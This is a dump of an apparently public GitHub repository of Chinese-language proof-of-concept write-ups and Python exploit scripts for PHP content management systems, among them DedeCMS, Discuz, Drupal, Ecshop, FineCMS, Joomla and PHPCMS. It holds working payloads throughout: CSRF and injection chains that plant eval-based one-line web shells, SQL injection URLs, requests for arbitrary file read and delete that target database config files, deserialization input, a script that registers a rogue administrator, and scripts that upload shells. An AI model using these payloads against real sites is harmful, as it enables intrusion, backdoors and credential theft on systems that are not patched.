https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/add_good.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/add_shopcar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/add_shopcar.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/back_xssed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/back_xssed.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/edit_address.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/edit_address.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/xssed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/xssed.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/README.md: -------------------------------------------------------------------------------- 1 | # DedeCMS_v5.7_shops_delivery_存储型XSS 2 | 3 | ## Affected Version 4 | 5 | DedeCMS-V5.7-UTF8-SP2 ( 发布日期 2017-03-15 ) 6 | 7 | 需要站点启用商城功能。 8 | 9 | 下载地址: 链接: https://pan.baidu.com/s/1bprjPx1 密码: mwdq 10 | 11 | 12 | ## PoC 13 | 14 | 该漏洞比较鸡肋,需要登录 管理员后台通过 添加配送方式 功能 ,添加后在前后台都会触发 存储型 XSS 15 | 16 | 之所以会触发是因为在系统对 管理员输入的 配送方式-描述字段(des)在入库前只进行 addslashes 转义特殊字符处理,其实这没毛病 17 | 18 | 重要的是取出数据库的数据输出到页面前没进行 HTML 实体编码处理直接输出导致最终的 XSS 19 | 20 | 测试: 21 | 22 | 1. 后台添加 配送方式 23 | 24 | ![](add_delivery.png) 25 | 26 | 2. 添加成功后直接展示配送方式列表,触发 XSS 27 | 28 | ![](show_delivery.png) 29 | 30 | 3. 此外,这个 XSS 在前台用户购买东西选择配送方式的时候也会触发 31 | 32 | ![](front_xssed.png) 33 | 34 | ## References 35 | 36 | 1. https://www.seebug.org/vuldb/ssvid-92863 37 | -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/add_delivery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/add_delivery.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/front_xssed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/front_xssed.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/show_delivery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_shops_delivery_存储型XSS/show_delivery.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/README.md: -------------------------------------------------------------------------------- 1 | # DedeCMS_v5.7_友情链接CSRF_GetShell 2 | 3 | ## Affected Version 4 | 5 | DedeCMS-V5.7-UTF8-SP2 ( 发布日期 2017-03-15 ) 6 | 7 | 下载地址: 链接: https://pan.baidu.com/s/1bprjPx1 密码: mwdq 8 | 9 | 10 | ## PoC 11 | 12 | 该版本在新建&修改标签功能(可以写PHP文件到本地)存在CSRF漏洞,通过申请友情链接的方式,诱使管理员点击,从而从 Referer 中拿到 后台路径,进而以管理员的身份写一句话到服务器上 GetShell 。 13 | 14 | 测试: 15 | 16 | 1. 申请友链 17 | 18 | ![](apply.png) 19 | 20 | 2. 编辑 友链 信息 21 | 22 | ![](edit.png) 23 | 24 | dedecms_csrf.php 的内容如下: 25 | 26 | '; 30 | $exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php'; 31 | $url = $dede_login.$exp; 32 | header("location: ".$url); 33 | exit(); 34 | 35 | 3. 管理员登陆后台后 对 友链进行审核 36 | 37 | ![](link_list.png) 38 | 39 | 4. 审核的时候一般都会点击 地址 看一下网站的内容,由于友链中使用了header 跳转,所以结果其实是访问了 `http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php` 请求。 40 | 41 | ![](click_res.png) 42 | 43 | 5. 查看写入到服务器的一句话 `shell.lib.php` 44 | 45 | ![](shell.png) 46 | 47 | ## References 48 | 49 | 1. http://0day5.com/archives/4209/ 50 | -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/apply.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/apply.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/click_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/click_res.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/edit.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/link_list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/link_list.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell/shell.png -------------------------------------------------------------------------------- /Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/1.PNG -------------------------------------------------------------------------------- /Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/README.md: -------------------------------------------------------------------------------- 1 | # Discuz_<3.4_birthprovince_前台任意文件删除 2 | 3 | ## Affected Version 4 | 5 | Discuz < 3.4 版本 6 | 7 | 需要会员身份登陆站点。 8 | 9 | 下载地址: 链接: https://pan.baidu.com/s/1hsOoSte 密码: nvjj 10 | 11 | 12 | ## PoC 13 | 14 | 15 | 测试: 16 | 17 | 1. 为了不破坏原有程序,在根目录下新建 1.txt 作为演示。 18 | 19 | ![1](1.PNG) 20 | 21 | 2. 登陆前台,访问 http://localhost/Discuz/Discuz_X3.2_TC_BIG5/home.php?mod=spacecp&ac=profile&op=base 22 | 23 | 先发起一个POST请求 24 | 25 | birthprovince=../../../1.txt&profilesubmit=1&formhash=18a19dce 26 | // formhash 需要右键查看源代码得到 27 | 28 | 成功后,个人信息已经被修改成如下: 29 | 30 | ![changed](changed.PNG) 31 | 32 | 3. 最后,本地提交POST表单删除文件 1.txt 33 | 34 | 表单内容: 35 | 36 |
37 | 38 |

39 |

40 | 41 | 42 | 43 | 随便上传一个图片提交会导致删除 birthprovince 设置的文件名称,在这里是 1.txt。 44 | 45 | ## References 46 | 47 | 1. http://www.freebuf.com/vuls/149904.html 48 | 2. http://www.freebuf.com/articles/system/149810.html 49 | -------------------------------------------------------------------------------- /Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/changed.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/changed.PNG -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/1.png -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/2.png -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/README.md: -------------------------------------------------------------------------------- 1 | # Drupal远程代码执行漏洞(CVE-2017-6920) 2 | 3 | ## Affected Version 4 | 5 | 内核版本是 8.x,且版本号低于 8.3.4 6 | 7 | ## PoC 8 | 9 | 注意: Apache 需要开启 yaml 扩展,这里使用的环境是 PHP 5.5 配合 yaml 1.3.0 扩展。 10 | 11 | 测试: 12 | ![](poc.png) 13 | 14 | 登录后台确认用户中增加了 Administrator 的一个用户: 15 | ![](poc_res.png) 16 | 17 | ## References 18 | 19 | 1. http://paper.seebug.org/334/ 20 | 2. https://bbs.aliyun.com/read/319901.html 21 | -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/poc.txt: -------------------------------------------------------------------------------- 1 | 在/user/login登陆后 2 | 访问http://xx.xx.xx.xx/admin/config/development/configuration/single/import 3 | 4 | Configuration type:Simple configuration 5 | Configuration name:随意填写 6 | Paste your configuration here填写以下poc 7 | !php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}" -------------------------------------------------------------------------------- /Ecshop/ecshop2.x_code_execute/readme.md: -------------------------------------------------------------------------------- 1 | 2 | ## Affected Version 3 | 4 | **ecshop2.x** 5 | 6 | ## POC 7 | 8 | **Referer处。** 9 | 10 | ### 注入 11 | Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} 12 | ![](http://opmi2ydgh.bkt.clouddn.com//18-9-3/61896860.jpg) 13 | 14 | ### 代码执行 15 | 16 | Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} 17 | 18 | 在网站根目录下生成1.php的一句话。 19 | 20 | assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//}xxx 21 | file_put_contents('1.php','') 22 | 23 | ## References 24 | 25 | [ecshop2.x代码执行](http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/) 26 | 27 | [ECShop全系列版本远程代码执行高危漏洞分析](https://xz.aliyun.com/t/2689) 28 | 29 | 30 | -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/FineCMS/FineCMS最新版5.0.8两处getshell/1.png -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/FineCMS/FineCMS最新版5.0.8两处getshell/2.png -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/FineCMS/FineCMS最新版5.0.8两处getshell/3.png -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/README.md: -------------------------------------------------------------------------------- 1 | # FineCMS最新版5.0.8两处getshell 2 | 3 | ## Affected Version 4 | 5 | 5.0.8 6 | 7 | ## poc 8 | 9 | 第一处payload 10 | 11 | 12 | 127.0.0.1/finecms/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+ 13 | 14 | 15 | 查看结果 16 | 17 | ![](http://opmi2ydgh.bkt.clouddn.com//17-7-3/35617053.jpg) 18 | 19 | 第二处 20 | 21 | 先注册,登录,然后写入恶意代码。 22 | 23 | ![](http://opmi2ydgh.bkt.clouddn.com//17-7-3/81165201.jpg) 24 | 25 | 会在\uploadfile\member文件夹下生成写入的代码文件夹以及恶意代码。 26 | 27 | ![](http://opmi2ydgh.bkt.clouddn.com//17-7-3/57501522.jpg) 28 | 29 | ## References 30 | 1. http://4o4notfound.org/index.php/archives/40/ 31 | 2. https://github.com/404notf0und/CMS-POC/tree/master/script 32 | 33 | -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/finecms-5.0.8-getshell.py: -------------------------------------------------------------------------------- 1 | import random 2 | import sys 3 | import requests 4 | def poc(target): 5 | payload="/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+" 6 | url=target+payload 7 | shell=target+'/uploadfile/member/0/0x0.php' 8 | try: 9 | result=requests.get(url,timeout=3) 10 | verify=requests.get(shell,timeout=3) 11 | if verify.status_code==200 and 'code' in verify.text: 12 | return True 13 | except Exception,e: 14 | print e 15 | 16 | -------------------------------------------------------------------------------- /FineCMS/FineCMS最新版5.0.8两处getshell/finecms-5.0.8-getshell2.py: -------------------------------------------------------------------------------- 1 | #Finecms version:5.0.8 2 | #Author:404notfound 3 | 4 | import random 5 | import sys 6 | import requests 7 | def poc(url): 8 | username=random.randint(0,999999) 9 | seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 10 | email = [] 11 | for i in range(8): 12 | email.append(random.choice(seed)) 13 | email = ''.join(email) 14 | #print email+"@"+email+".com" 15 | #print username 16 | 17 | #step 1 register 18 | #print "[+] register user" 19 | register_url=url+"/index.php?s=member&c=register&m=index" 20 | register_payload={"back":"","data[username]":username,"data[password]":"123456","data[password2]":"123456","data[email]":email+"@"+email+".com"} 21 | #step 2 login 22 | #print "[+] user login" 23 | login_url=url+"/index.php?s=member&c=login&m=index" 24 | login_payload={"back":"","data[username]":username,"data[password]":"123456","data[auto]":"1"} 25 | #step 3 attack 26 | #print "[+] loading payload" 27 | vul_url=url+"/index.php?s=member&c=account&m=upload" 28 | vul_payload={"tx":"data:image/php;base64,NDA0bm90Zm91bmQ8P3BocCBwaHBpbmZvKCk7Pz4="} 29 | try: 30 | s = requests.session() 31 | resu=s.post(register_url,data=register_payload) 32 | result=s.post(login_url,data=login_payload) 33 | result2=s.post(vul_url,data=vul_payload).content 34 | if "status" in result2: 35 | return True 36 | else: 37 | return False 38 | except Exception,e: 39 | pass 40 | #print e 41 | #print "[+] ALL DONE" 42 | #step 4 find shell path 43 | 44 | #print poc("http://localhost") 45 | 46 | -------------------------------------------------------------------------------- /Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/README.md: -------------------------------------------------------------------------------- 1 | # Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869) 2 | 3 | ## Affected Version 4 | 5 | Joomla! 3.4.4 - 3.6.3 6 | 7 | ## PoC 8 | 9 | 注意: 由于默认关闭注册功能,所以导致创建的管理员用户未激活无法使用。 10 | 11 | 测试: 12 | ![](poc.png) 13 | 14 | 登录后台确认用户中增加了 Administrator 的一个用户: 15 | ![](poc_res.png) 16 | 17 | ## References 18 | 19 | 1. http://blog.knownsec.com/2016/10/joomla-register-cve-2016-8869/ 20 | 21 | 2. https://github.com/sunsunza2009/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870 -------------------------------------------------------------------------------- /Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/poc.png -------------------------------------------------------------------------------- /Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/poc.py: -------------------------------------------------------------------------------- 1 | # coding: utf-8 2 | # CVE-2016-8869 3 | # author: Anka9080 4 | 5 | import re 6 | import requests 7 | import random 8 | 9 | def extract_token(resp): 10 | match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S) 11 | if match is None: 12 | print("[!] Cannot find CSRF token") 13 | return None 14 | print('[*] Your token is '+match.group(1)) 15 | return match.group(1) 16 | 17 | def poc(target): 18 | headers = { 19 | "Content-Type":"application/x-www-form-urlencoded" 20 | } 21 | proxies = { 22 | 'http':'127.0.0.1:8080' 23 | } 24 | s = requests.Session() 25 | r = s.get(target+'index.php/component/users/?task=registration.register',proxies=proxies) # get cookie 26 | token = extract_token(r) 27 | # print r.headers 28 | randstr = '_'+str(random.randint(1,10000)) 29 | # build post data 30 | print('[*] create user: {}'.format('admin'+randstr)) 31 | data = { 32 | # User object 33 | 'task':(None,'user.register'), 34 | 'option':(None,'com_users'), 35 | 'user[name]': (None,'admin'+randstr), 36 | 'user[username]': (None,'admin'+randstr), 37 | 'user[password1]': (None,'admin'), 38 | 'user[password2]': (None,'admin'), 39 | 'user[email1]': (None,'admin'+randstr +'@xx.com'), 40 | 'user[email2]': (None,'admin'+randstr +'@xx.com'), 41 | 'user[groups][]': (None,'7'), # Administrator! 42 | token:(None,'1') 43 | } 44 | try: 45 | r = s.post(target+'index.php/component/users/?task=registration.register',files=data,proxies=proxies,allow_redirects=False) 46 | if 'index.php?option=com_users&view=registration' in r.headers['location']: 47 | print('[+] {} is vul !'.format(target)) 48 | return True 49 | except Exception , e: 50 | print('[!] err: {}'.format(str(e))) 51 | 52 | return False 53 | 54 | 55 | if __name__ == '__main__': 56 | poc('http://localhost/joomla/Joomla_3.6.3-Stable-Full_Package/') 57 | 58 | -------------------------------------------------------------------------------- /Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/poc_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Joomla/Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)/poc_res.png -------------------------------------------------------------------------------- /Joomla/Joomla_3.7.0_SQL注入(CVE-2017-8917)/README.md: -------------------------------------------------------------------------------- 1 | # Joomla! 3.7.0 SQL注入(CVE-2017-8917) 2 | 3 | ## Official 4 | 5 | https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html 6 | 7 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917 8 | 9 | ## Affected Version 10 | 11 | Joomla! 3.7.0 12 | 13 | ## PoC 14 | 15 | 直接访问,爆出数据库用户名: 16 | 17 | http://foo.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) 18 | 19 | ![poc.png](poc.png) 20 | 21 | 22 | 23 | ## References 24 | 25 | 1. http://blog.nsfocus.net/joomla-3-7-0-sql-injection-vulnerability/ 26 | -------------------------------------------------------------------------------- /Joomla/Joomla_3.7.0_SQL注入(CVE-2017-8917)/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Joomla/Joomla_3.7.0_SQL注入(CVE-2017-8917)/poc.png -------------------------------------------------------------------------------- /Joomla/Joomla_3.7.0_SQL注入(CVE-2017-8917)/poc.py: -------------------------------------------------------------------------------- 1 | # coding: utf-8 2 | 3 | import requests 4 | 5 | def poc(target): 6 | 7 | url = target+"index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" 8 | 9 | r = requests.get(url) 10 | 11 | # print r.text 12 | if 'XPATH syntax error:' in r.text: 13 | print '[!] {} is vul. '.format(target) 14 | return True 15 | 16 | if __name__ == '__main__': 17 | poc('http://localhost/joomla/Joomla_3.7.0-Stable-Full_Package/') -------------------------------------------------------------------------------- /Metinfo/Metinfo6.0.0/methifo6.0.0.md: -------------------------------------------------------------------------------- 1 |  2 | ## Affected Version 3 | 4 | **Metinfo 6.0.0** 5 | 6 | ## POC 7 | 8 | ### 1 CMS安装的时候,比如数据库名字会被直接写进配置文件中。 9 | 10 | ### 2 任意删除 11 | 12 | 好像需要登陆后,才能执行成功。 admin目录下。 13 | 14 | 192.168.0.4/metinfo600/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/test.txt 15 | 16 | ### 3 任意文件读取 17 | 18 | ![](http://opmi2ydgh.bkt.clouddn.com//18-9-12/44499643.jpg) 19 | 20 | metinfo600/include/thumb.php?dir=http\..\..\config\config_db.php 21 | 22 | ## References 23 | 24 | [Metinfo 6.0.0 众多漏洞分析](https://www.anquanke.com/post/id/154149) 25 | 26 | [ MetInfo 任意文件读取漏洞的修复与绕过](https://paper.seebug.org/676/) 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # PHPCMS_v9.6.0_SQL注入 2 | 3 | ## Official 4 | 5 | http://bbs.phpcms.cn/thread-936226-1-1.html 6 | 7 | ## Affected Version 8 | 9 | PHPCMS v9.6.0 10 | 11 | ## PoC 12 | 13 | ![](poc.png) 14 | 15 | 16 | 17 | ## References 18 | 19 | 1. https://zhuanlan.zhihu.com/p/26263513 20 | -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_SQL注入/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.0_SQL注入/poc.png -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/README.md: -------------------------------------------------------------------------------- 1 | # PHPCMS_v9.6.0_任意文件上传 2 | 3 | ## Official 4 | 5 | http://bbs.phpcms.cn/thread-936226-1-1.html 6 | 7 | ## Affected Version 8 | 9 | PHPCMS v9.6.0 10 | 11 | ## PoC 12 | 13 | 注意: 每次测试后都需要把 poc.py 中 post data 的 username 和 email 修改一遍。 14 | 15 | ![poc.png](poc.png) 16 | 17 | 使用菜刀连接: 18 | 19 | ![caidao1.png](caidao1.png) 20 | 21 | ![caidao2.png](caidao2.png) 22 | 23 | 24 | 25 | ## References 26 | 27 | 1. http://www.evilclay.com/2017/05/10/PHPCMSv9-6-0任意文件上传漏洞分析/ 28 | -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/caidao1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.0_任意文件上传/caidao1.png -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/caidao2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.0_任意文件上传/caidao2.png -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.0_任意文件上传/poc.png -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/poc.py: -------------------------------------------------------------------------------- 1 | # coding: utf-8 2 | import re 3 | import requests 4 | 5 | 6 | def poc(url): 7 | u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url) 8 | data = { 9 | 'siteid': '1', 10 | 'modelid': '2', 11 | 'username': 'testxxx', 12 | 'password': 'testxxxxx', 13 | 'email': 'test@texxxst.com', 14 | 'info[content]': '', 15 | 'dosubmit': '1', 16 | } 17 | rep = requests.post(u, data=data) 18 | 19 | shell = '' 20 | re_result = re.findall(r'<img src=(.*)>', rep.content) 21 | # print rep.content 22 | if len(re_result): 23 | shell = re_result[0] 24 | print '上传的一句话木马地址:',shell 25 | 26 | if __name__ == '__main__': 27 | poc('http://localhost/PHPCMS/PHPCMS_v9.6.0/') # 目标站点根目录 -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.0_任意文件上传/shell.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.1_任意文件下载/README.md: -------------------------------------------------------------------------------- 1 | # PHPCMS_v9.6.1_任意文件下载 2 | 3 | ## Affected Version 4 | 5 | PHPCMS v9.6.1 6 | 7 | ## PoC 8 | 9 | 注意: 若本地测试 PoC 执行失败可以通过该指定 hosts文件 localhost 为 127.0.0.1 解决。 10 | 11 | ![poc.png](poc.png) 12 | 13 | ## References 14 | 15 | 1. http://bobao.360.cn/learning/detail/3805.html?m=wap&c=index&a=init&siteid=1 16 | 2. https://www.seebug.org/vuldb/ssvid-92959 -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.1_任意文件下载/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.1_任意文件下载/poc.png -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.1_任意文件下载/poc.py: -------------------------------------------------------------------------------- 1 | # coding: utf-8 2 | ''' 3 | name: PHPCMS v9.6.1 任意文件下载 4 | author: Anka9080 5 | description: 过滤函数不严谨导致任意文件下载。 6 | ''' 7 | import sys 8 | import requests 9 | from termcolor import cprint 10 | 11 | def poc(target): 12 | print('第一次请求,获取 cookie_siteid ') 13 | url = target +'index.php?m=wap&c=index&a=init&siteid=1' 14 | s = requests.Session() 15 | r = s.get(url) 16 | cookie_siteid = r.headers['set-cookie'] 17 | cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:] 18 | # print cookie_siteid 19 | print('第二次请求,获取 att_json ') 20 | 21 | url = target + 'index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph%26f%3Dp%3%25252%2*70C' 22 | post_data = { 23 | 'userid_flash':cookie_siteid 24 | } 25 | r = s.post(url,post_data) 26 | # print r.headers 27 | for cookie in s.cookies: 28 | if '_att_json' in cookie.name: 29 | cookie_att_json = cookie.value 30 | # print cookie_att_json 31 | print('第三次请求,获取 文件下载链接 ') 32 | url = target + 'index.php?m=content&c=down&a=init&a_k=' + cookie_att_json 33 | r = s.get(url) 34 | if 'm=content&c=down&a=download&a_k=' in r.text: 35 | cprint('[!] Vul : {}'.format(target),'red') 36 | return True 37 | else: 38 | return False 39 | if __name__ == "__main__": 40 | 41 | poc('http://localhost/PHPCMS/PHPCMS_v9.6.1/') -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.2_任意文件下载/README.md: -------------------------------------------------------------------------------- 1 | # PHPCMS_v9.6.2_任意文件下载 2 | 3 | ## Affected Version 4 | 5 | - PHPCMS v9.6.1 6 | - PHPCMS v9.6.2 7 | 8 | ## PoC 9 | 10 | 复现的时候需要注意两点: 11 | 12 | 1. 新安装的 PHPCMS_v9.6.2 目录 \PHPCMS_v9.6.2\caches\caches_commons\caches_data 缺少缓存模型文件 model.cache.php 可以通过复制 PHPCMS_v9.6.1 响应目录的文件得到。 13 | 14 | 2. 通过 xxx.php/ 的方式绕过文件后缀名检测需要在 PHP 版本为 5.2.x 时 才可以成功读取文件。 15 | 16 | 